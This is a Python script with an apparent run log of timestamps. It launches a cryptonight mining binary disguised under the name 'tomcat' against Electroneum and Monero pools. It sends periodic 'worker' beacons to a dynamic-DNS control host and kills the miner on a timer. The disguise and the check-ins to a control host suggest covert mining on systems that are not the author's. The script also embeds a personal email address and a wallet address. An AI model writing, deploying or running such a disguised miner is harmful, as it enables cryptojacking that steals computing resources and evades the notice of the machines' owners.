import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:38:06.325479
#2018-02-17 17:26:05.584251
#2018-02-17 19:15:05.616957
#2018-02-17 21:03:04.080737
#2018-02-17 22:48:03.660832
#2018-02-18 00:33:01.801126
#2018-02-18 02:23:01.519486
#2018-02-18 04:10:03.883236
#2018-02-18 06:01:04.456651
#2018-02-18 07:51:05.900865
#2018-02-18 09:39:03.808872
#2018-02-18 11:25:05.523392
#2018-02-18 13:11:01.895652
#2018-02-18 14:59:07.134252
#2018-02-18 16:48:06.304274
#2018-02-18 18:36:03.757739
#2018-02-18 20:24:04.777476
#2018-02-18 22:10:09.268438
#2018-02-18 23:58:06.328751
#2018-02-19 01:45:06.407066
#2018-02-19 03:33:05.769213
#2018-02-19 05:18:02.066952
#2018-02-19 07:04:02.127060
#2018-02-19 08:52:06.534815
#2018-02-19 10:41:06.728292
#2018-02-19 12:28:07.850128
#2018-02-19 14:16:03.495604
#2018-02-19 16:05:08.448756
#2018-02-19 17:52:05.696995
#2018-02-19 19:38:04.198125
#2018-02-19 21:27:05.650696
#2018-02-19 23:14:06.470396
#2018-02-20 01:01:02.173828
#2018-02-20 02:49:07.694338
#2018-02-20 04:36:07.368123
#2018-02-20 06:21:05.131356
#2018-02-20 08:06:04.646546
#2018-02-20 09:51:01.845721
#2018-02-20 11:35:08.400116
#2018-02-20 13:23:09.457167
#2018-02-20 15:08:01.324150
#2018-02-20 16:52:05.714082
#2018-02-20 18:41:12.881441
#2018-02-20 20:33:05.044806
#2018-02-20 22:20:04.574645
#2018-02-21 00:01:05.231653
#2018-02-21 01:46:05.244606
#2018-02-21 03:34:03.666607
#2018-02-21 05:23:04.750808
#2018-02-21 07:10:02.270596
#2018-02-21 08:55:06.261890
#2018-02-21 10:42:07.810475
#2018-02-21 12:30:08.660155
#2018-02-21 14:18:01.391397
#2018-02-21 16:05:04.993044
#2018-02-21 17:56:02.204837
#2018-02-21 19:43:01.725165
#2018-02-21 21:31:06.511672
#2018-02-21 23:17:03.662090
#2018-02-22 01:06:05.240034
#2018-02-22 02:55:04.253119
#2018-02-22 04:42:01.997446
#2018-02-22 06:27:05.325998
#2018-02-22 08:15:01.600022
#2018-02-22 10:04:05.893694
#2018-02-22 11:48:08.673273
#2018-02-22 13:33:06.036553
#2018-02-22 15:22:09.121269
#2018-02-22 17:07:06.216681
#2018-02-22 18:53:05.057627
#2018-02-22 20:45:02.133055
#2018-02-22 22:32:04.022884
#2018-02-23 00:17:06.346447
#2018-02-23 02:06:01.828109
#2018-02-23 03:53:06.628193
#2018-02-23 05:39:04.518292
#2018-02-23 07:24:07.827255
#2018-02-23 09:27:06.266145
#2018-02-23 11:34:05.980150
#2018-02-23 13:25:04.997435
#2018-02-23 14:54:04.412436
#2018-02-23 16:31:01.654612
#2018-02-23 18:02:01.738326
#2018-02-23 19:36:08.854576
#2018-02-23 21:07:02.220385
#2018-02-23 22:44:07.514881
#2018-02-24 00:19:06.916880
#2018-02-24 01:58:01.840713
#2018-02-24 03:31:03.734075
#2018-02-24 05:00:04.860734
#2018-02-24 06:32:01.444092
#2018-02-24 08:11:06.537025
#2018-02-24 09:40:08.880062
#2018-02-24 11:23:07.171393
#2018-02-24 12:51:02.132161
#2018-02-24 14:24:07.824302
#2018-02-24 15:56:06.523485
#2018-02-24 17:35:06.643874
#2018-02-24 19:07:05.926298
#2018-02-24 20:38:04.561063
#2018-02-24 22:17:07.227938
#2018-02-25 00:55:05.512716
#2018-02-25 03:54:02.005689
#2018-02-25 06:39:01.575847
#2018-02-25 11:36:06.252885
#2018-02-25 13:36:01.542312
#2018-02-25 15:10:01.691679